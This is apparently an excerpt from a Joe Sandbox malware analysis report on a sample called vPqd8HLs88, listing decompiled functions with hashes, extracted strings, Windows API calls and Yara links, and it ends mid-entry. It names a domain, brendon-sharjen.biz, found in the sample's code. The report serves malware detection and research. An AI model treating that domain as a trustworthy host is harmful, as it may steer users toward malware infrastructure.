Instruction ID: 7ba58a2278fd69101984f35cdfd73b68bd41d9aae2e487d378bac50c2911b04a
Opcode Fuzzy Hash: bab740c4131d47c8ee67dc110200e8d71687f758c37eb31044e26f8606fb6957
Instruction Fuzzy Hash: FDD157B5A00225CBDB248F65EC517ABB7B1FF86310F18816DD841AB795E7389D01CB98

Function 00429275 Relevance: 6.6, Strings: 5, Instructions: 318COMMON

Download Yara Rule

Strings

@HD, xrefs: 0042947C
II1D, xrefs: 0042948A
ZPZ_, xrefs: 00429483
UHII1DZPZ_@HDRXRW, xrefs: 004294F5
RXRW, xrefs: 00429475

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: @HD$II1D$RXRW$UHII1DZPZ_@HDRXRW$ZPZ_
API String ID: 0-2120590494
Opcode ID: fa148107934ec22cd5069d986451fe2c213bac1ebe7a5e30f9f9a72a9a980d54
Instruction ID: a261a53bb02daa8d55a9ee8f462f06156f841808213290fd0a3d9bb88be8b3d4
Opcode Fuzzy Hash: fa148107934ec22cd5069d986451fe2c213bac1ebe7a5e30f9f9a72a9a980d54
Instruction Fuzzy Hash: F8B15CB1E042168FCB24CF68D4416AFFBB2AF55314F54866ED46967382D738EC02CB95

Function 009794DC Relevance: 6.6, Strings: 5, Instructions: 318COMMON

Download Yara Rule

Strings

ZPZ_, xrefs: 009796EA
II1D, xrefs: 009796F1
RXRW, xrefs: 009796DC
UHII1DZPZ_@HDRXRW, xrefs: 0097975C
@HD, xrefs: 009796E3

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: @HD$II1D$RXRW$UHII1DZPZ_@HDRXRW$ZPZ_
API String ID: 0-2120590494
Opcode ID: fa148107934ec22cd5069d986451fe2c213bac1ebe7a5e30f9f9a72a9a980d54
Instruction ID: 4387d784149f330b193e35b9d880522eb0133dca676137c1692a125ed82e4ad0
Opcode Fuzzy Hash: fa148107934ec22cd5069d986451fe2c213bac1ebe7a5e30f9f9a72a9a980d54
Instruction Fuzzy Hash: B1B159B1D042528FCB24CF68C441AAEFBB2EF95310F18865DD46A6B782D735ED06CB91

Function 00424600 Relevance: 6.5, Strings: 5, Instructions: 275COMMON

Download Yara Rule

Strings

BKB, xrefs: 00424B17
B_B, xrefs: 00425F2C
BT, xrefs: 0042465A
Kv, xrefs: 00424652
Z~, xrefs: 00424662

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: BKB$B_B$BT$Kv$Z~
API String ID: 0-2447844628
Opcode ID: 1cccfb9b7a12a16639283274a07a2230c04cc37ecb04486f253a53a21705c5ea
Instruction ID: 41d60e318bfc84058616c38a8017db35b3146dd0457df77541efcff1ef03d612
Opcode Fuzzy Hash: 1cccfb9b7a12a16639283274a07a2230c04cc37ecb04486f253a53a21705c5ea
Instruction Fuzzy Hash: 8491E2759083649FE720CF25E844B5FBBF4FBC6718F10882CE594AB281D7B499098F96

Function 009790EA Relevance: 6.5, Strings: 5, Instructions: 254COMMON

Download Yara Rule

Strings

At, xrefs: 0097943F
GI, xrefs: 00979146
MB, xrefs: 0097914D
=t, xrefs: 009793F8
CE, xrefs: 0097933D

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: =t$At$GI$MB$CE
API String ID: 0-1115079355
Opcode ID: ca8fa90780371cd8046139a40f1612da85b68ec4ecd52cafbabc4950fa9ca481
Instruction ID: 9ccafe074a1ebbec11f401903ef9b3787d58516368247cd399e4c9f3a5e3efc5
Opcode Fuzzy Hash: ca8fa90780371cd8046139a40f1612da85b68ec4ecd52cafbabc4950fa9ca481
Instruction Fuzzy Hash: 0B7137B2A003118BDB348F69C8917ABB7B1FF86710F18C558D89A9F795E3389D02CB50

Function 00417B7D Relevance: 6.2, Strings: 4, Instructions: 1201COMMON

Download Yara Rule

Strings

tv, xrefs: 004187B8
n;o=, xrefs: 00418658
l?E!, xrefs: 00418660
Uq"s, xrefs: 00418250

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: Uq"s$l?E!$n;o=$tv
API String ID: 0-3865798824
Opcode ID: 5a6f3d103248a5133894e85a660d6135405f010b944590dca2a3038af31131c4
Instruction ID: 9a8c084a0e3a3d1f81143382cef168443ca77d8b15ee3b42c3fe5c03462fb779
Opcode Fuzzy Hash: 5a6f3d103248a5133894e85a660d6135405f010b944590dca2a3038af31131c4
Instruction Fuzzy Hash: 9D8259726183518BC724CF29C8913ABB7E2FFC9714F198A2EE4C987391E7389941C746

Function 00958C47 Relevance: 6.1, APIs: 4, Instructions: 99threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00958C68
GetCurrentThreadId.KERNEL32 ref: 00958C70
GetForegroundWindow.USER32 ref: 00958CD8
ExitProcess.KERNEL32 ref: 00958D86

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitForegroundThreadWindow
String ID:
API String ID: 3118123366-0
Opcode ID: 7179407272bce60cdc6937b4fcffc8bd720db954a79fdd5ac3918b57226f4f70
Instruction ID: 1601240b944ed35360a1ba4f5a32730f01814917a8966492cd5c2907997a0d3a
Opcode Fuzzy Hash: 7179407272bce60cdc6937b4fcffc8bd720db954a79fdd5ac3918b57226f4f70
Instruction Fuzzy Hash: EE316733E006141BC718BABA8D4B36ABADB4BC5301F0E41396D89EB3D1ED745C0943C1

Function 00426320 Relevance: 5.4, Strings: 4, Instructions: 396COMMON

Download Yara Rule

Strings

52, xrefs: 004263A7
<8, xrefs: 0042639F
-5, xrefs: 00426397
%%, xrefs: 0042638F

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: %%$-5$52$<8
API String ID: 0-1128558009
Opcode ID: 8a55940a690532274f030624f85eeffc50f72cb16207464cccd3270f476b5e41
Instruction ID: cc2be77d66a48409f57b52d7d15eed03f5b94e1c424b31e3d279d8b1402fce11
Opcode Fuzzy Hash: 8a55940a690532274f030624f85eeffc50f72cb16207464cccd3270f476b5e41
Instruction Fuzzy Hash: 35D1F0B9609340DFE720DF24E88176FBBA1FBC6304F95982DE5854B261D738D941CB4A

Function 0040ABC0 Relevance: 5.4, Strings: 4, Instructions: 375COMMON

Download Yara Rule

Strings

WNO@, xrefs: 0040AD26
~, xrefs: 0040AE16
o, xrefs: 0040ABE1
JVL, xrefs: 0040AD1E

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: WNO@$o$~$JVL
API String ID: 0-3715106896
Opcode ID: e4c6886d84cbd7ff7126c3a551a092b829708cf869d04b8c854f95d7c0ecc52b
Instruction ID: 61e93c9d638c4de2b64ce56eded293134a784d530760b2aaaacf2eee11c137b4
Opcode Fuzzy Hash: e4c6886d84cbd7ff7126c3a551a092b829708cf869d04b8c854f95d7c0ecc52b
Instruction Fuzzy Hash: C3C1077174C3514BC714DE2898512AFFBD3DBD2304F1C893EE8D56B385D679881A878A

Function 0095AE27 Relevance: 5.4, Strings: 4, Instructions: 375COMMON

Download Yara Rule

Strings

JVL, xrefs: 0095AF85
~, xrefs: 0095B07D
o, xrefs: 0095AE48
WNO@, xrefs: 0095AF8D

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: WNO@$o$~$JVL
API String ID: 0-3715106896
Opcode ID: e4c6886d84cbd7ff7126c3a551a092b829708cf869d04b8c854f95d7c0ecc52b
Instruction ID: f9a60326e7108b55703137d0a9cd730aaf7729bf2546bd58e52f680ca6bba4d0
Opcode Fuzzy Hash: e4c6886d84cbd7ff7126c3a551a092b829708cf869d04b8c854f95d7c0ecc52b
Instruction Fuzzy Hash: 7CC1357274C3504BD324DF2A98512AFFBE3ABD2305F1C892CE8E65B385D77588098796

Function 0095D872 Relevance: 4.9, APIs: 1, Strings: 2, Instructions: 358COMMON

Download Yara Rule

APIs

CoUninitialize.COMBASE ref: 0095D87E

Strings

^ZPh, xrefs: 0095D960
brendon-sharjen.biz, xrefs: 0095DCE8

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: ^ZPh$brendon-sharjen.biz
API String ID: 3861434553-1931448812
Opcode ID: 6d85464a4c27d714253e41de2a24cdd7121462f98545f0207570b49a4807941d
Instruction ID: f9fb4f56a8f85f6e9a77eaa22e0d77b6dd17eddffa284d3a47ec9190b4ddb044
Opcode Fuzzy Hash: 6d85464a4c27d714253e41de2a24cdd7121462f98545f0207570b49a4807941d
Instruction Fuzzy Hash: 0AB1FFB154D3C18FD335CF2AC8907EBBBE1AF92301F09896CD8D99B250DA755909CB92

Function 0040DAA4 Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 331COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0040DAB0

Strings

brendon-sharjen.biz, xrefs: 0040DEEF
^ZPh, xrefs: 0040DB89

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID: Uninitialize
String ID: ^ZPh$brendon-sharjen.biz
API String ID: 3861434553-1931448812
Opcode ID: 7715acc31612e1ddc6cd5daed71277af3f9891a9f0007f18dc148ea1d162bfea
Instruction ID: 89d598a289bbd84bac73ea7606ff7ea02523b180c65328e9f941809cba950f54
Opcode Fuzzy Hash: 7715acc31612e1ddc6cd5daed71277af3f9891a9f0007f18dc148ea1d162bfea
Instruction Fuzzy Hash: B4A120B154C3D08BD335CF6988907EBBBE1AF93300F09896DC4D9AB391D6794809DB96

Function 0097C4FB Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 581COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?), ref: 0097C5DD

Strings

>17:, xrefs: 0097C6FA

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: >17:
API String ID: 3664257935-1108518575
Opcode ID: 46b8cd04c4b9c286579a25c59f194b469d7899db2c45aa54d1851902b917222d
Instruction ID: c6cc703152041cf10060adb22ffe68105fd27a5a418a7504687b6c6deba7772f
Opcode Fuzzy Hash: 46b8cd04c4b9c286579a25c59f194b469d7899db2c45aa54d1851902b917222d
Instruction Fuzzy Hash: 0EF1F5725097818FDB168F39C490762BBE2AF97300F18C59DC4DA8F796D739A806CB61

Function 00418C0E Relevance: 4.1, Strings: 3, Instructions: 317COMMON

Download Yara Rule

Strings

{}, xrefs: 00418D85
fg, xrefs: 00418DA6
f, xrefs: 00418F28

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: f$fg${}
API String ID: 0-1967710109
Opcode ID: 7e09a703c82657eaf1273003cdf2f2c5bcf1d20abddd389306156c1b28611b05
Instruction ID: aae12db23b3788d98dea9680feaecec02383ea2548b454809a45c8d67d8be104
Opcode Fuzzy Hash: 7e09a703c82657eaf1273003cdf2f2c5bcf1d20abddd389306156c1b28611b05
Instruction Fuzzy Hash: 22B177B11183808BD7358F25C8A13EBBBE1FF96304F19891DD4C98B355EB389941CB96

Function 00409120 Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

w, xrefs: 0040925C
p, xrefs: 004092A4
cb, xrefs: 0040929D

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: cb$p$w
API String ID: 0-2558045562
Opcode ID: 765a29f0211201a6742b5601e609cb9eae4b2bd6f3368b4168d7606e9857f8dd
Instruction ID: 9dc2c72e5ead76aa4ceaa205b55d68a5b16210bedcbe93a35f7211c0301ac567
Opcode Fuzzy Hash: 765a29f0211201a6742b5601e609cb9eae4b2bd6f3368b4168d7606e9857f8dd
Instruction Fuzzy Hash: 5971E86150C3828BD7198F2984A076BFFE19FE6305F18486EE8D65B3C2D6398909CB56

Function 00959387 Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

cb, xrefs: 00959504
w, xrefs: 009594C3
p, xrefs: 0095950B

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: cb$p$w
API String ID: 0-2558045562
Opcode ID: 765a29f0211201a6742b5601e609cb9eae4b2bd6f3368b4168d7606e9857f8dd
Instruction ID: 2b94320f921d28738bc2805e17d5e843863bc62aeef0ccbf9965d918569fed0b
Opcode Fuzzy Hash: 765a29f0211201a6742b5601e609cb9eae4b2bd6f3368b4168d7606e9857f8dd
Instruction Fuzzy Hash: 9B71F66150D3C2CBE719CF2A84A076BFFD19FE2306F2C486DE8D64B241D639891AC756

Function 004248C0 Relevance: 4.0, Strings: 3, Instructions: 287COMMON

Download Yara Rule

Strings

BKB, xrefs: 00424B17
t2t4, xrefs: 004249D5
B_B, xrefs: 00425F2C

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: BKB$B_B$t2t4
API String ID: 0-1981236614
Opcode ID: 958938924c0b89df781601d8715f34be6ad2f886226d47998113cb2390b8a4ce
Instruction ID: 614ae0a42cfed9dc08d9bfdba0cffc7c05148e483d0e251fe3c94daf7921e395
Opcode Fuzzy Hash: 958938924c0b89df781601d8715f34be6ad2f886226d47998113cb2390b8a4ce
Instruction Fuzzy Hash: E0A1DDB4E143189FEB20DF68EC4679EBBB4FB85304F1041ADE558AB281E7745948CF92

Function 0096888D Relevance: 4.0, Strings: 3, Instructions: 217COMMON

Download Yara Rule

Strings

tv, xrefs: 00968A1F
n;o=, xrefs: 009688BF
l?E!, xrefs: 009688C7

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: l?E!$n;o=$tv
API String ID: 0-1287815614
Opcode ID: 52eaeb7f128f6d50e641a27113b01a989792768135268d85aa3dfa5527528a24
Instruction ID: b10f872df76ace7758fe064c65007896fb4a5391e4de156a49eba3f7b7e47200
Opcode Fuzzy Hash: 52eaeb7f128f6d50e641a27113b01a989792768135268d85aa3dfa5527528a24
Instruction Fuzzy Hash: 737112B16183528BC3188F28C4913BBB7F1FFD8704F248A1DE4C95B291E7788901CB46

Function 00426E30 Relevance: 3.9, Strings: 3, Instructions: 198COMMON

Download Yara Rule

Strings

?0@y, xrefs: 00427688
st, xrefs: 0042767E
*+, xrefs: 00427783

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: *+$?0@y$st
API String ID: 0-3200688088
Opcode ID: 04aa4156c73ddabf55af22e28ecd7eebcfee022abee846016d8c987ee9497927
Instruction ID: 18b39e1dde662e51f3017477cc623d6fc9aee4735e45f5c29a444de813fcac7f
Opcode Fuzzy Hash: 04aa4156c73ddabf55af22e28ecd7eebcfee022abee846016d8c987ee9497927
Instruction Fuzzy Hash: 4161CDB460C3908BC7249F25D9127ABBBE2FFC2304F14986DD1C99B255EB388505CB5A

Function 0095092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

., xrefs: 0095095F
l, xrefs: 00950966
GetProcAddress., xrefs: 009509DC, 009509DF, 009509E4

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: c68385ec447801ac24268bedc5851c827575f54343d27fe32b42e5c59e3e40c7
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 49317CB6900609CFDB10CF99C880AADBBF9FF88325F14404AD841A7311D771EA49CBA4

Function 0095BF5E Relevance: 3.8, Strings: 3, Instructions: 88COMMON

Download Yara Rule

Strings

\ U", xrefs: 0095BFAE
#$, xrefs: 0095BFB6
[,R., xrefs: 0095BFC7

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: #$$[,R.$\ U"
API String ID: 0-750793529
Opcode ID: f1b01fd242b07a04e8f8bcacdafb8edcbc1296bc280c2f5b12c6c3b95147904b
Instruction ID: 47080b3ecb3679e651be96aa5a5fe3622d1a97e41b1d5ad8917e5a43b1539a41
Opcode Fuzzy Hash: f1b01fd242b07a04e8f8bcacdafb8edcbc1296bc280c2f5b12c6c3b95147904b
Instruction Fuzzy Hash: 9E210376B983409FC3188F35CC813AABBE39BC2211F29D43CE699D7365D979C4068B06

Function 00404C10 Relevance: 3.3, Strings: 2, Instructions: 805COMMON

Download Yara Rule

Strings

0, xrefs: 00405547
8, xrefs: 0040553F

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: bcaf76292425f822605e7373c8d9abfae66734edaeb691de1f4859e088257416
Instruction ID: 25bae1e47d7d56949933a0e78302b03e45d6945f536d58c80bbc069f41dcd89c
Opcode Fuzzy Hash: bcaf76292425f822605e7373c8d9abfae66734edaeb691de1f4859e088257416
Instruction Fuzzy Hash: D77224716083419FD714CF28C894B6BBBE1EF88314F04892EF9999B391D379D948CB96

Function 00954E77 Relevance: 3.3, Strings: 2, Instructions: 805COMMON

Download Yara Rule

Strings

8, xrefs: 009557A6
0, xrefs: 009557AE

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: bcaf76292425f822605e7373c8d9abfae66734edaeb691de1f4859e088257416
Instruction ID: cfa3e615507746ec2c7e86d5e46e94ec576f883a4399c6fc75235a897510eef5
Opcode Fuzzy Hash: bcaf76292425f822605e7373c8d9abfae66734edaeb691de1f4859e088257416
Instruction Fuzzy Hash: F87267716087409FD724CF19C890BABBBE1AF88315F15891DF9898B392D375D948CF92

Function 0041CF70 Relevance: 3.1, Strings: 2, Instructions: 596COMMON

Download Yara Rule

Strings

rI, xrefs: 0041D12F
!", xrefs: 0041D373

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: !"$rI
API String ID: 0-844706243
Opcode ID: 0f4dc5e425522722d8aec5e92a7d28b9ce0f0d2dfe82a70a307180c5e10c13b8
Instruction ID: 59239d79965ae17ad11677737b57ea6d04b107aa7ec12c9d27328e48433055a1
Opcode Fuzzy Hash: 0f4dc5e425522722d8aec5e92a7d28b9ce0f0d2dfe82a70a307180c5e10c13b8
Instruction Fuzzy Hash: 4B02EDB1A083108BC704DF69C8916ABFBF2EF95314F04892DE8D58B352E739D945CB96

Function 0097CABD Relevance: 2.9, Strings: 2, Instructions: 375COMMON

Download Yara Rule

Strings

=7>4, xrefs: 0097D054
.g~_, xrefs: 0097D05B

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: .g~_$=7>4
API String ID: 0-1087258636
Opcode ID: 0ee4a42d4746e8c695e657f20942a5ca1c5fef09a2babe658cd80fe75d08c8a3
Instruction ID: 9de80b20a24ce9d8c3896674c5661136900584725ea8e8a86adc7c9f2ea1f20d
Opcode Fuzzy Hash: 0ee4a42d4746e8c695e657f20942a5ca1c5fef09a2babe658cd80fe75d08c8a3
Instruction Fuzzy Hash: 35B1BEB16096828FD7198F39C060766BBE1AF57304F28C5ADC4DA8B792C7369806CB54

Function 0041D690 Relevance: 2.9, Strings: 2, Instructions: 367COMMON

Download Yara Rule

Strings

'^_P, xrefs: 0041DA3A, 0041DA47
de, xrefs: 0041D916

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: '^_P$de
API String ID: 0-3551605531
Opcode ID: 011ccc9b8a72fff37c233147ae8e80253a213ba1f7343ab2b4b8b360e21f74d2
Instruction ID: fbee645a751c7581883523adc8075052a5fcce7af7ffc2945cf5a62ecf3d6b57
Opcode Fuzzy Hash: 011ccc9b8a72fff37c233147ae8e80253a213ba1f7343ab2b4b8b360e21f74d2
Instruction Fuzzy Hash: B691E1B19183118BC724DF24C8526ABB3F0FF92354F18995EE4D98B391E738D944C79A

Function 0096D8F7 Relevance: 2.9, Strings: 2, Instructions: 367COMMON

Download Yara Rule

Strings

de, xrefs: 0096DB7D
'^_P, xrefs: 0096DCA1, 0096DCAE

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: '^_P$de
API String ID: 0-3551605531
Opcode ID: 792279698758c2ffb64c9fee2c79c8ad9636a83cdf72c6d7e5ede998132a912c
Instruction ID: 6072ee6f029e2c56a81f2c1d0fdbfada9287b8d6347e74e10c6b1b08c4f5d2db
Opcode Fuzzy Hash: 792279698758c2ffb64c9fee2c79c8ad9636a83cdf72c6d7e5ede998132a912c
Instruction Fuzzy Hash: 2D91EFB1A093418BC724DF24C852A7BB3F4FF96314F19991DE8E58B290E738D904C756

Function 004150B0 Relevance: 2.9, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

ca, xrefs: 0041533B
5TA, xrefs: 0041542F

Memory Dump Source

Source File: 00000000.00000002.1667180260.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1667180260.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vPqd8HLs88.jbxd

Similarity

API ID:
String ID: 5TA$ca
API String ID: 0-3467899122
Opcode ID: 368189eafa560932345657250382ebb5a9ec7132bc4bb5ee5f6dbd2b219bd2c5
Instruction ID: 6bdb7ea39ea8358c717945c8ccffd2e000072dcdef5c738ea096326466136862
Opcode Fuzzy Hash: 368189eafa560932345657250382ebb5a9ec7132bc4bb5ee5f6dbd2b219bd2c5
Instruction Fuzzy Hash: EAB12676905700CBD3209F25CC817EBB7A2FFC5714F09862EE8888B391E7789945CB56

Function 0098EB47 Relevance: 2.8, Strings: 2, Instructions: 337COMMON

Download Yara Rule

Strings

], xrefs: 0098EBFB
], xrefs: 0098EBBE

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: ]$]
API String ID: 0-2815796728
Opcode ID: 45a586ed15f6806d5bb60f7a938cd24a0f88f5fd92f76d67d15c4410da70c3b8
Instruction ID: d2cc2ddb8a0c771a829fb9113a3834ad7284fc6bafbafb92e8d0f4a9ca40a6b1
Opcode Fuzzy Hash: 45a586ed15f6806d5bb60f7a938cd24a0f88f5fd92f76d67d15c4410da70c3b8
Instruction Fuzzy Hash: F9A13736A083108FD328EF14C8A1A7BB7A6EBD5714F18893DE9D657391CB359C45C781

Function 0097CE29 Relevance: 2.8, Strings: 2, Instructions: 334COMMON

Download Yara Rule

Strings

=7>4, xrefs: 0097D054
.g~_, xrefs: 0097D05B

Memory Dump Source

Source File: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_vPqd8HLs88.jbxd

Yara matches

Similarity

API ID:
String ID: .g~_$=7>4
API String ID: 0-1087258636
Opcode ID: 4f7c81578270dfb32f384486994a9efb397590a112fa787ad23bf454c89eedae
Instruction ID: 29bd992905478337427406dacd6f16d5e4341953830f64ac42351984c1c997c1
Opcode Fuzzy Hash: 4f7c81578270dfb32f384486994a9efb397590a112fa787ad23bf454c89eedae
Instruction Fuzzy Hash: 0CA1CEB16096818FD719CF39C460726BFE1AF96304F28C4ADD4DA8B792CB36D806CB54

Function 004042E0 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

